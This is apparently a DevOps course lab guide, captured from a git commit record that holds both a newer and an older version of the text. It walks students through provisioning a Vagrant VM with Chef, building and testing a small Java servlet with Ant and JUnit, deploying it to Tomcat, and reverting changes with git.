Class1.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 INTERNAL_gitignore\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 MainServlet.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 TestClass1.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 web.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 nervios\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 nervios.sh\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 pies\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 pies.sh\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 shared\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 _apt-update.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 _junit.rb\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 test\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u251c\u2500\u2500 data_bags\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 README.txt\n\n(more files)\n....\n\nThe \".rb\" extension indicates the Ruby language, which is used to develop Chef scripts.\n\nTIP: If you are using Putty or some other terminal emulator and getting garbage characters like \u00e2\u00e2\u00e2 in your tree, see http:\/\/unix.stackexchange.com\/questions\/61293\/how-can-i-change-locale-encoding-to-avoid-getting-weird-characters-in-terminal[here].\n\nThis directory structure is the entire Calavera project, which is a simple DevOps simulation that all runs through Vagrant.\n\nExamine the Vagrantfile again (use `cat` or `more`), and notice in the Vagrantfile the directives:\n\n manos.vm.provision :chef_zero do |chef|\n\nThe above tells Vagrant to use Chef to set up the virtual machine.\n\n chef.cookbooks_path = [\".\/cookbooks\/\"]\n\nThe above tells Chef where the cookbooks are.\n\n....\nchef.add_recipe \"shared::_apt-update\"\nchef.add_recipe \"git::default\"\nchef.add_recipe \"localAnt::default\"\nchef.add_recipe \"java7::default\"\nchef.add_recipe \"localTomcat::v8\"\nchef.add_recipe \"shared::_junit\"\nchef.add_recipe \"manos::default\"\n\n....\n\nFinally, the above tells Chef to apply a series of recipes from various parts of the tree. These recipes install software and configure the system in various ways.\n\n*Have a look at some of them.* Use \"cat.\"\n\n YourStudentID@serverXXX:~\/Calavera$ cat cookbooks\/localAnt\/recipes\/default.rb\n\nThe combination of these recipes precisely describes what the virtual machine will look like. If you delete a VM and bring it back up, it should look exactly the same every time.\n\nNow, the current Vagrantfile is a little dangerous, because if you type \"vagrant up\" it will try to bring up ALL of the machines. So, I have created a shell script you should use.\n\nIMPORTANT: DO NOT ISSUE A `vagrant up` COMMAND IN THIS LAB.\n\nReturn to the Calavera base directory and issue the following commands:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ cd ~\/Calavera\/\nYourStudentID@serverXXX:~\/Calavera$ .\/lab-03.sh\nLab 03 manos configuration\nLaunching from linux\/mac\nSkipping remote git\nBringing machine 'manos1' up with 'virtualbox' provider...\n manos1: The Berkshelf shelf is at \"\/home\/char\/.berkshelf\/vagrant-berkshelf\/shelves\/berkshelf20160925-23989-fdanrr-manos1\"\n==> manos1: Sharing cookbooks with VM\n==> manos1: Importing base box 'opscode-ubuntu-14.04a'...\n==> manos1: Matching MAC address for NAT networking...\n [more]\n....\n\nIt will take several minutes to launch the new Vagrant instance. In the meantime, YOU NEED TO WATCH THE OUTPUT.\n\nLook for the language \"Fixed port collision\" in a series like this. THE NUMBERS WILL BE DIFFERENT:\n\n....\n==> manos: Fixed port collision for 22 => 2114. Now on port 2201.\n==> manos: Fixed port collision for 80 => 8114. Now on port 2202.\n==> manos: Fixed port collision for 8080 => 9114. Now on port 2203.\n==> manos: Fixed port collision for 22 => 2222. Now on port 2214.\n==> manos: Clearing any previously set network interfaces...\n==> manos: Preparing network interfaces based on configuration...\n manos: Adapter 1: nat\n==> manos: Forwarding ports...\n manos: 22 => 2201 (adapter 1)\n manos: 80 => 2202 (adapter 1)\n manos: 8080 => 2203 (adapter 1)\n manos: 22 => 2214 (adapter 1)\n==> manos: Booting VM...\n....\n\nMAKE NOTE OF THE PORT 8080 MAPPING. In the above, it says \"Now on port 2203.\" You will have a DIFFERENT number. Write it down.\n\n****\nONLY *if you miss your port*, or can't find it, you will need to do:\n\n vboxmanage list vms\n\nYou should see output including something like:\n\n\"Calavera_manos_XXXXXXXXXXXXX_XXXXX\" {389dab0f-2f52-434e-bf50-c9792c42416a}\n\nGo:\n\n vboxmanage showvminfo Calavera_manos_XXXXXXXXXXXXX_XXXXX|more (replacing the X's with the actual numbers, you should cut and paste)\n\nLook for this line:\n\n....\nNIC 1 Rule(3): name = tcp8134, protocol = tcp, host ip = , host port = XXXX, guest ip = , guest port = 8080\n....\n\nCopy down the \"XXXX.\" It is your port 8080 mapping.\n****\n\nOnce you have your port 8080 mapping and the Vagrant launching process is complete, you can access your VM's web server. Manos comes preconfigured with a running Tomcat instance and a simple test-harness based Java application. You can see it running when you ssh into the VM:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ vagrant ssh manos\nWelcome to Ubuntu 14.04.2 LTS (GNU\/Linux 3.13.0-24-generic x86_64)\n\n * Documentation: https:\/\/help.ubuntu.com\/\nLast login: Sat Feb 21 22:03:53 2015 from 10.0.2.2\n....\n\nNext, run the curl command pointing at the running web application:\n....\nvagrant@manos:~$ curl localhost:8080\/MainServlet\n<h1>This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n....\nWhat is \"curl\"? curl is like a web browser for the command line.\nFor more read @ http:\/\/curl.haxx.se\/docs\/manpage.html\n\nYou can also see the same thing from OUTSIDE your virtual machine:\n\n....\nvagrant@manos:~$ exit\nlogout\nConnection to 127.0.0.1 closed.\ntest4@seis660:~\/Calavera$ curl 127.0.0.1:2203\/MainServlet\n<h1>This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n....\n\nIMPORTANT: Instead of typing 2203 for the port number, you should substitute the port number that 8080 was mapped to by Vagrant.\n\nFinally, you can view it in a real browser over X windows.\n\nNOTE: You may not find much use for X-windows in the outside world, but it is helpful here as it prevents us from worrying about hardening the local Vagrant VMs.\n\nFirst, be sure you logged into the server with X enabled. You need to either:\n\n* Check the box in Putty \/\/ For people using xming 6.9 above, there will be enable x11 forwarding checkbox under ssh.\n* go \"ssh -X YourStudentID@serverXXX\" if you are using your Mac console\n\nNOTE: You do *not* need Firefox on your local laptop for this to work. You *do* need to have X11 forwarding working, with a local Xwindows display. For example, if XMing is installed, open XLaunch and click through the screens with the defaults. See also https:\/\/github.com\/dm-academy\/aitm-labs\/blob\/master\/Lab-00\/00-tech-lab.adoc[Lab 00], Configuring X-Windows.\n\nType \"xclock\" for a quick test. See https:\/\/github.com\/dm-academy\/aitm-labs\/blob\/master\/Lab-00\/00-tech-lab.adoc[Configuring X-Windows] in Lab 00.\n\nAt the command line, go:\n....\nYourStudentID@serverXXX:~$ firefox -no-remote \"127.0.0.1:2203\/MainServlet\"\n\n(process:46597): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size == 0' failed\nGtk-Message: Failed to load module \"canberra-gtk-module\"\n....\n\nIt will throw a lot of errors, ignore them. You should (slowly) get a Firefox browser painted on your screen. This is X-windows in action, Firefox is actually running on the server.\n\nimage::browser2.png[]\n\nYou can either close Firefox or hit Command-C to exit.\n\nExit your VM.\n\n== A look at the application\n\nLet's look at what goes into making this little app work. First, how did it get there? If you are still in your VM, exit from the VM back to the classroom server. Be sure you are in the Calavera directory.\n\nYou can see the resources used by the application if you go:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ tree cookbooks\/manos\/\ncookbooks\/manos\/\n\u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 build.xml\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 Class1.java\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 INTERNAL_gitignore\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 MainServlet.java\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 TestClass1.java\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 web.xml\n\u251c\u2500\u2500 metadata.rb\n\u2514\u2500\u2500 recipes\n \u2514\u2500\u2500 default.rb\n....\n\nNow, the cookbook here includes the raw ingredients (the contents of the cookbooks\/manos\/files directory) as well as the recipes of how to set them up on the VM. Especially, have a look at cookbooks\/manos\/recipes\/default.rb:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ more cookbooks\/manos\/recipes\/default.rb\n# manos-default\n\n# set up developer workstation\n\n# assuming Chef has set up Java, Tomcat, ant and junit\n# need to establish directory structure\n# move source code over\n\npackage \"tree\"\n\ngroup 'git'\n\nuser 'vagrant' do\n group 'git'\nend\n\n[\"\/home\/hijo\/src\/main\/config\",\n \"\/home\/hijo\/src\/main\/java\/biz\/calavera\",\n \"\/home\/hijo\/src\/test\/java\/biz\/calavera\",\n \"\/home\/hijo\/target\/biz\/calavera\"].each do | name |\n\n directory name do\n mode 00775\n action :create\n user \"vagrant\"\n group \"git\"\n recursive true\n end\nend\n\nfile_map = {\n \"INTERNAL_gitignore\" => \"\/home\/hijo\/.gitignore\",\n \"build.xml\" => \"\/home\/hijo\/build.xml\",\n \"web.xml\" => \"\/home\/hijo\/src\/main\/config\/web.xml\",\n \"Class1.java\" => \"\/home\/hijo\/src\/main\/java\/biz\/calavera\/Class1.java\",\n \"MainServlet.java\" => \"\/home\/hijo\/src\/main\/java\/biz\/calavera\/MainServlet.java\",\n \"TestClass1.java\" => \"\/home\/hijo\/src\/test\/java\/biz\/calavera\/TestClass1.java\"\n}\n\n# download each file and place it in right directory\nfile_map.each do | fileName, pathName |\n cookbook_file fileName do\n path pathName\n user \"vagrant\"\n group \"git\"\n action :create\n end\nend\n\n...\n....\n\nThere is more, but you get the idea. Without going into the https:\/\/en.wikipedia.org\/wiki\/Ruby_(programming_language)[Ruby] code this is written in (which would be too much detail for this class), this script is creating a set of directory structures on the new manos VM and populating them with the basic https:\/\/en.wikipedia.org\/wiki\/Java_(programming_language)[Java] and https:\/\/en.wikipedia.org\/wiki\/Apache_Ant[Ant] files needed. For example, this command:\n\n \"build.xml\" => \"\/home\/hijo\/build.xml\"\n\nsays,\n\n. take the file called `build.xml` from the source files on the host, and\n. copy it into `\/home\/hijo\/build.xml` on the guest.\n\nGo back into your manos VM and have a look at the home\/hijo directory:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ vagrant ssh manos\nWelcome to Ubuntu 14.04.2 LTS (GNU\/Linux 3.13.0-24-generic x86_64)\n\n * Documentation: https:\/\/help.ubuntu.com\/\nLast login: Sun Feb 22 18:29:29 2015 from 10.0.2.2\n....\n\nNow run the tree command:\n\n....\nvagrant@manos:~$ tree \/home\/hijo\n\/home\/hijo\n\u251c\u2500\u2500 build.xml\n\u251c\u2500\u2500 src\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 main\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 config\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 web.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 biz\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 calavera\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 Class1.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 MainServlet.java\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 test\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 java\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 biz\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 calavera\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 TestClass1.java\n\u2514\u2500\u2500 target\n \u251c\u2500\u2500 biz\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 calavera\n \u2502\u00a0\u00a0 \u251c\u2500\u2500 Class1.class\n \u2502\u00a0\u00a0 \u251c\u2500\u2500 MainServlet.class\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 TestClass1.class\n \u251c\u2500\u2500 CalaveraMain.jar\n \u251c\u2500\u2500 result.txt\n \u251c\u2500\u2500 result.xml\n \u2514\u2500\u2500 web.xml\n\n....\n\nThat configured directory tree is the outcome of the Chef scripts that were applied when the first Vagrant up was done.\n\nWithout going deeply into object-oriented programming, this application has three major parts:\n\n. A main class that controls everything (`MainServlet.java`).\n. A class called `Class1.java` that does 2 things:\n.. Returns a string \"five\" when you call the `.five` method on the class\n.. Wraps any string with the tags <H1> and <\/H1>, turning it into an HTML heading 1 string.\n. A test class, `TestClass1.java`, that tests `Class1.java` (but not `MainServlet.java`, just because that gets complicated for a simple exercise like this).\n\nBut wait, there is more. How is Tomcat actually serving up the servlet?\n\nRun tree:\n\n....\nvagrant@manos:\/home\/hijo$ tree \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/\n\/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/\n\u251c\u2500\u2500 lib\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 CalaveraMain.jar\n\u2514\u2500\u2500 web.xml\n\n1 directory, 2 files\n....\n\nIn order for the `CalaveraMain.jar` file to be served up, it needs to be put in the `WEB-INF\/lib` directory that Tomcat knows about, and the `web.xml` file needs to be updated as well. How did this happen?\n\nAnd as a matter of fact, where did that `CalaveraMain.jar` file come from, anyways? It wasn't part of the files stored in the cookbook...!? Go back and look.\n\nThis is where the magic of Ant comes in. `CalaveraMain.jar` is a **compiled and packaged** version of the java classes you see in the `java\/biz\/calavera` directory.\n\nBack when Java first came out, the developer would have to painstakingly compile and package the software by hand, move it manually to the Tomcat directory, and restart Tomcat. But with Ant (and similar tools like https:\/\/maven.apache.org\/[Maven]), we can do this all automatically. Go:\n\n....\nvagrant@manos:~$ cd \/home\/hijo\/\nvagrant@manos1:\/home\/hijo$ sudo ant\nBuildfile: \/home\/hijo\/build.xml\n\ninit:\n [echo]\n [echo] \t\t\tComputer name is ${my_env.COMPUTERNAME}\n [echo] \t\t\tBuild time is 2016-09-26_01:27:10 UTC (e.g. US CT +6)\n [echo] User name is root\n [echo] \t\t\tBuilding from \/home\/hijo\/build.xml\n [echo] \t\t\tJava is version 1.7\n [echo] \t\t\tProject is ${ant.project.name}\n [echo] \t\t\tAnt is Apache Ant(TM) version 1.9.7 compiled on April 9 2016\n [echo] \t\t\tBasedir is \/home\/hijo\n [echo] \t\t\tSource is .\/src\/main\/java\/biz\/calavera\n [echo] \t\t\tBuild target is .\/target\n [echo] \t\t\tDeployment target is \/var\/lib\/tomcat8\/webapps\/ROOT\/WEB-INF\/lib\n [echo] \t\t Classpath is \/home\/hijo:\/var\/lib\/tomcat8\/lib\/servlet-api.jar:\/usr\/bin\/junit-4.12.jar:\/usr\/bin\/hamcrest-core-1.3.jar\n [echo]\n\ncompile:\n [javac] Compiling 2 source files to \/home\/hijo\/target\n [javac] Compiling 1 source file to \/home\/hijo\/target\n\ntest:\n [echo]\n [echo] \t\t\tentering test\n [echo]\n [junit] Running biz.calavera.TestClass1\n [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.041 sec\n\ncompress:\n [jar] Building jar: \/home\/hijo\/target\/CalaveraMain.jar\n\ndeploy:\n [delete] Deleting directory \/var\/lib\/tomcat8\/webapps\/ROOT\/WEB-INF\/lib\n [mkdir] Created dir: \/var\/lib\/tomcat8\/webapps\/ROOT\/WEB-INF\/lib\n [copy] Copying 1 file to \/var\/lib\/tomcat8\/webapps\/ROOT\/WEB-INF\/lib\n [echo]\n [echo] \t\t\tAttempting Tomcat restart.\n [echo]\n [exec] Tomcat started.\n\nmain:\n [echo]\n [echo] \t\t\tbuilt and deployed to Tomcat.\n [echo]\n\nBUILD SUCCESSFUL\nTotal time: 1 second\nvagrant@manos1:\/home\/hijo$\n....\n\n\nYou can see the Ant script at build.xml. Compare that script to the output. It is:\n\n- Running the junit tests (more on that later)\n- Compiling the java *.java files into *.class files\n- Packaging the *.java files into a *.jar file\n- Moving the jar file to the appropriate Tomcat directory, along with the web.xml configuration file\n- Restarting Tomcat\n\nIf you are interested in Ant further, you can see more about it at http:\/\/ant.apache.org\/.\n\n== Changing the application\n\nLet's play with the Java a little bit. Start by editing the MainServlet.java file:\n\n....\nvagrant@manos:\/home\/hijo$ nano src\/main\/java\/biz\/calavera\/MainServlet.java\n\n GNU nano 2.2.6 File: src\/main\/java\/biz\/calavera\/MainServlet.java Modified\n\npackage biz.calavera;\n\n\/\/package test;\n\nimport java.io.*;\nimport javax.servlet.*;\nimport javax.servlet.http.*;\n\npublic class MainServlet extends HttpServlet {\n \/\/ Import required java libraries\n\n private String message;\n\n public void init() throws ServletException\n {\n \/\/ Edit this message, save the file, and rebuild with Ant\n \/\/ to see it reflected on the Web page at http:\/\/localhost:8081\/MainServlet\n message = \"This is a skeleton application-- to explore the end to end Calavera delivery framework.\";\n }\n\n public void doGet(HttpServletRequest request,\n HttpServletResponse response)\n throws ServletException, IOException\n {\n \/\/ Set response content type\n response.setContentType(\"text\/html\");\n\n \/\/ Actual logic goes here.\n PrintWriter out = response.getWriter();\n Class1 oResp = new Class1(message);\n\n out.println(oResp.webMessage());\n }\n\n public void destroy()\n {\n \/\/ do nothing.\n }\n }\n....\n\nFind the line that says:\n\n message = \"This is a skeleton application-- to explore the end to end Calavera delivery framework.\"\n\nand change it to\n\n message = \"YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.\"\n\nExit nano and run Ant again:\n\n vagrant@manos:\/home\/hijo$ sudo ant\n [ same output as before ]\n\nNow try:\n\n vagrant@manos:\/home\/hijo$ curl localhost:8080\/MainServlet\n <h1>YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n\nIf you did it correctly, you should see that Tomcat (via curl) is now serving up the change you made. Many automated steps were executed between you making that change and it appearing in curl!\n\nNOTE: If you want to see this in firefox, just open a *new* ssh session to SEIS660 with X enabled and don't go into your VM. Remember to use your specific mapped 8080 port number that Vagrant setup.\n\nLet's add it to git:\n....\nvagrant@manos:\/home\/hijo$ git add src\/main\/java\/biz\/calavera\/MainServlet.java\nvagrant@manos:\/home\/hijo$ git commit -m \"my local java\"\n[master 04ff3cb] my local java\n 1 file changed, 1 insertion(+), 1 deletion(-)\n....\nNOTE: Git is installed, with a repo initialized already in \/home\/hijo. If this were a completely new system, you would need to install git and init the repo.\n\nReview your change:\n\n....\nvagrant@manos:\/home\/hijo$ git log -p -1\ncommit 04ff3cb11264ed3429889512451722c3069b3264\nAuthor: Charles Betz <char@calavera.biz>\nDate: Sun Feb 22 19:44:19 2015 +0000\n\n my local java\n\ndiff --git a\/src\/main\/java\/biz\/calavera\/MainServlet.java b\/src\/main\/java\/biz\/calavera\/MainServlet.java\nindex 35cdac4..54f2be4 100644\n--- a\/src\/main\/java\/biz\/calavera\/MainServlet.java\n+++ b\/src\/main\/java\/biz\/calavera\/MainServlet.java\n@@ -15,7 +15,7 @@ public class MainServlet extends HttpServlet {\n {\n \/\/ Edit this message, save the file, and rebuild with Ant\n \/\/ to see it reflected on the Web page at http:\/\/localhost:8081\/MainServlet\n- message = \"This is a skeleton application-- to explore the end to end Calavera delivery framework.\";\n+ message = \"YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.\";\n }\n\n public void doGet(HttpServletRequest request,\n....\n\nHit `q` to get out of the git review.\n\nNow, let's break something.\n\nReview the test class:\n\n....\nvagrant@manos:\/home\/hijo$ more src\/test\/java\/biz\/calavera\/TestClass1.java\npackage biz.calavera;\n\nimport static org.junit.Assert.*;\n\nimport org.junit.After;\nimport org.junit.AfterClass;\nimport org.junit.Before;\nimport org.junit.BeforeClass;\nimport org.junit.Test;\n\npublic class TestClass1 {\n\n\tprivate Class1 a;\n\n\t@BeforeClass\n\tpublic static void setUpBeforeClass() throws Exception {\n\t}\n\n\t@AfterClass\n\tpublic static void tearDownAfterClass() throws Exception {\n\t}\n\n\t@Before\n\tpublic void setUp() throws Exception {\n\t\t this.a = new Class1(\"TestWebMessage\");\n\t}\n\n\t@After\n\tpublic void tearDown() throws Exception {\n\t}\n\n\t@Test\n\tpublic void testTrue() {\n assertTrue(\"assertTrue test\", true); \/\/ true is true\n assertNotNull(\"a is not null\", this.a); \/\/a exists\n assertEquals(\"five is 5\", \"five\", this.a.five()); \/\/a.five = \"five\"\n assertEquals(\"string correctly generated\", \"<h1>TestWebMessage<\/h1>\", this.a.webMessag\ne()); \/\/ string built correctly\n\t}\n\n}\n....\n\nEdit the Class1.java file:\n\n....\nvagrant@manos:\/home\/hijo$ nano src\/main\/java\/biz\/calavera\/Class1.java\n\n GNU nano 2.2.6 File: src\/main\/java\/biz\/calavera\/Class1.java\n\npackage biz.calavera;\n\n\npublic class Class1 {\n String strMsg;\n\n public Class1 (String inString)\n {\n strMsg = inString;\n }\n public String five()\n {\n return \"five\";\n }\n\n public String webMessage()\n {\n return \"<h1>\" + strMsg + \"<\/h1>\";\n }\n\n\n }\n....\n\n\nReplace\n\n return \"five\";\n\nwith\n\n return \"four\";\n\nRebuild with ant:\n\n....\nvagrant@manos:\/home\/hijo$ sudo ant\nBuildfile: \/home\/hijo\/build.xml\n\ninit:\n [echo]\n [echo] \t\t\tComputer name is ${my_env.COMPUTERNAME}\n [echo] User name is root\n [echo] \t\t\tBuilding from \/home\/hijo\/build.xml\n [echo] \t\t\tJava is version 1.7\n [echo] \t\t\tProject is ${ant.project.name}\n [echo] \t\t\tAnt is Apache Ant(TM) version 1.9.4 compiled on April 29 2014\n [echo] \t\t\tBasedir is \/home\/hijo\n [echo] \t\t\tSource is .\/src\/main\/java\/biz\/calavera\n [echo] \t\t\tBuild target is .\/target\n [echo] \t\t\tDeployment target is \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/lib\n [echo]\n\ncompile:\n [javac] Compiling 2 source files to \/home\/hijo\/target\n [javac] Compiling 1 source file to \/home\/hijo\/target\n\ntest:\n [echo]\n [echo] \t\t\tentering test\n [echo]\n [junit] Running biz.calavera.TestClass1\n [junit] Tests run: 1, Failures: 1, Errors: 0, Skipped: 0, Time elapsed: 0.074 sec\n\nBUILD FAILED\n\/home\/hijo\/build.xml:69: Test biz.calavera.TestClass1 failed\n\nTotal time: 1 second\n....\n\nWe got something quite different - a failed build.\n\n\nWe can see the results this way:\n\n....\nvagrant@manos:\/home\/hijo$ cat target\/result.txt\nTestsuite: biz.calavera.TestClass1\nTests run: 1, Failures: 1, Errors: 0, Skipped: 0, Time elapsed: 0.074 sec\n\nTestcase: testTrue took 0.012 sec\n\tFAILED\nfive is 5 expected:<f[ive]> but was:<f[our]>\njunit.framework.AssertionFailedError: five is 5 expected:<f[ive]> but was:<f[our]>\n\tat biz.calavera.TestClass1.testTrue(Unknown Source)\n....\n\nNotice we can still curl. The broken build was not deployed to the local Tomcat.\n\n....\nvagrant@manos:\/home\/hijo$ curl localhost:8080\/MainServlet\n<h1>YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n....\n\n\nWhy did this happen? Go back to the test harness and notice the line:\n\n assertEquals(\"five is 5\", \"five\", this.a.five()); \/\/a.five = \"five\"\n\nNOTE: The `\/\/` in the line above indicates a comment in the Java test.\n\nWhat this says is there is a method (a command or instruction) on TestClass1 called \"five,\" and in fact if it is called it should (unsurprisingly) return EXACTLY the string \"`five`\". No more, no less.\n\nIn terms of the JUnit test language, the test ASSERTS that the method `five` invoked on the object `this.a` (which was constructed out of Class1, as you can see at the start of the test class), will be EQUAL to \"five.\" We purposefully broke the test by telling the method to return \"four\".\n\nTest driven development is a critically important part of building applications and you are encouraged to deepen your familiarity with it. This is the simplest, most basic discussion imaginable.\n\nLet's abandon the changes that \"broke the build\":\n\n vagrant@manos:\/home\/hijo$ git reset --hard\n\nThis command discards all changes you have not committed.\n\nDo\n\n cat src\/main\/java\/biz\/calavera\/Class1.java\n\nand you will see \"four\" reverted to \"five.\"\n\nFinally, let's go back to the original version without YourStudentID in the message:\n\n....\nvagrant@manos:\/home\/hijo$ git log --pretty=short --abbrev-commit\ncommit 3b810e4\nAuthor: Charles Betz <char@calavera.biz>\n\n my local java\n\ncommit b45dc90\nAuthor: Charles Betz <char@calavera.biz>\n\n initial commit\n....\n\nNotice in the above the line:\n\n commit 3b810e4\n\nThe string `3b810e4` is the commit hash. https:\/\/git-scm.com\/book\/en\/v2\/Getting-Started-Git-Basics[More on Git hashing & other topics.]\n\nFind the git commit hash associated with your commit by running `git log --pretty=short --abbrev-commit` as in the example above. Then, run the revert command:\n\n....\nvagrant@manos:\/home\/hijo$ git revert <hash>\n....\n\nNOTE: You will need to edit the revert message in nano. Save and exit.\n\n....\n[master b66c1c9] Revert \"my local java\"\n 1 file changed, 1 insertion(+), 1 deletion(-)\n....\n\nSee that \"YourStudentID\" is now removed, as we have reverted to the original version of the code.\n\n....\nvagrant@manos:\/home\/hijo$ cat src\/main\/java\/biz\/calavera\/MainServlet.java\n....\n\nRebuild with ant and check that the original functionality is restored. Use Curl again.\n\n\nExit your VM and destroy it:\n\n vagrant@manos:exit\n YourStudentID@serverXXX:~\/Calavera$ vagrant destroy manos -f\n\n\nCongratulations, you have finished another lab. Next up: an end to end DevOps pipeline.\n","old_contents":"= Lab 03 (Technical) The core application practices\n\n== Bringing up the VM\n\n**Overview**\n\nThe purpose of this lab is to give you a realistic, if brief overview of (reasonably) modern application development practices.\n\nLab objectives:\n\nIn this lab, you will work with basic application tools, as an individual developer. You will see test-driven development in action, in a very simple form, with automated build and deployment to a local Tomcat instance.\n\nYou will start by initializing a Vagrant machine that has been preconfigured as a simple developer workstation with:\n\n* https:\/\/en.wikipedia.org\/wiki\/Java_(programming_language)[Java]\n* http:\/\/junit.org\/[JUnit]\n* http:\/\/ant.apache.org\/[Ant]\n* http:\/\/tomcat.apache.org\/[Tomcat]\n* https:\/\/git-scm.com\/[git]\n\n**Prerequisites**\n\nYou must have completed lab 2 and issued pull requests for me.\n\n**Clone the Examples repository**\n\nLog into the main server via ssh in the usual way.\n\nMake sure you are in your home directory.\n\n cd ~\n\nInstall the following Vagrant plugin (you do have permissions to do this)\n\n....\nYourStudentID@serverXXX:~$ vagrant plugin install vagrant-berkshelf\nInstalling the 'vagrant-berkshelf' plugin. This can take a few minutes...\nInstalled the plugin 'vagrant-berkshelf (4.0.4)'!\nPost install message from the 'vagrant-berkshelf' plugin:\n\nThe Vagrant Berkshelf plugin requires Berkshelf from the Chef Development Kit.\nYou can download the latest version of the Chef Development Kit from:\n\n https:\/\/downloads.getchef.com\/chef-dk\n\nInstalling Berkshelf via other methods is not officially supported.\n....\n\nClone the Calavera project:\n\n....\nYourStudentID@serverXXX:~$ git clone https:\/\/github.com\/dm-academy\/Calavera.git\nCloning into 'Calavera'...\nremote: Counting objects: 1447, done.\nremote: Compressing objects: 100% (87\/87), done.\nremote: Total 1447 (delta 45), reused 0 (delta 0), pack-reused 1350\nReceiving objects: 100% (1447\/1447), 45.53 MiB | 3.09 MiB\/s, done.\nResolving deltas: 100% (652\/652), done.\nChecking connectivity... done.\n....\nChange to the Calavera directory:\n\n YourStudentID@serverXXX:~$ cd Calavera\/\n\nNow, you will see a new Vagrantfile. Have a look at it:\n\n YourStudentID@serverXXX:~\/Calavera$ more Vagrantfile\n\n(File is lengthy. More only shows you one screen at a time. You can hit the space bar repeatedly to go through it, or q to exit.)\n\nThere are a number of machines defined, such as\n\n\n....\n###############################################################################\n################################### base #################################\n###############################################################################\n....\n\nEach section like that defines how Vagrant should bring up a machine and configure it. There are a number of new commands we haven't seen before. Let's focus on the following:\n\n....\n\n###############################################################################\n################################### manos1 ##############################\n###############################################################################\n\n config.vm.define \"manos1\" do | manos1 |\n manos1.vm.host_name =\"manos1.calavera.biz\"\n manos1.vm.network \"private_network\", ip: \"10.1.0.14\"\n manos1.vm.network \"forwarded_port\", guest: 22, host: 2114, auto_correct: true\n manos1.vm.network \"forwarded_port\", guest: 80, host: 8114, auto_correct: true\n manos1.vm.network \"forwarded_port\", guest: 8080, host: 9114, auto_correct: true\n\n manos1.ssh.forward_agent =true\n\n manos1.vm.synced_folder \".\", \"\/home\/manos1\"\n manos1.vm.synced_folder \".\/shared\", \"\/mnt\/shared\"\n #manos1.vm.provision :shell, path: \".\/shell\/manos1.sh\"\n\n manos1.vm.provision :chef_zero do |chef|\n chef.cookbooks_path = 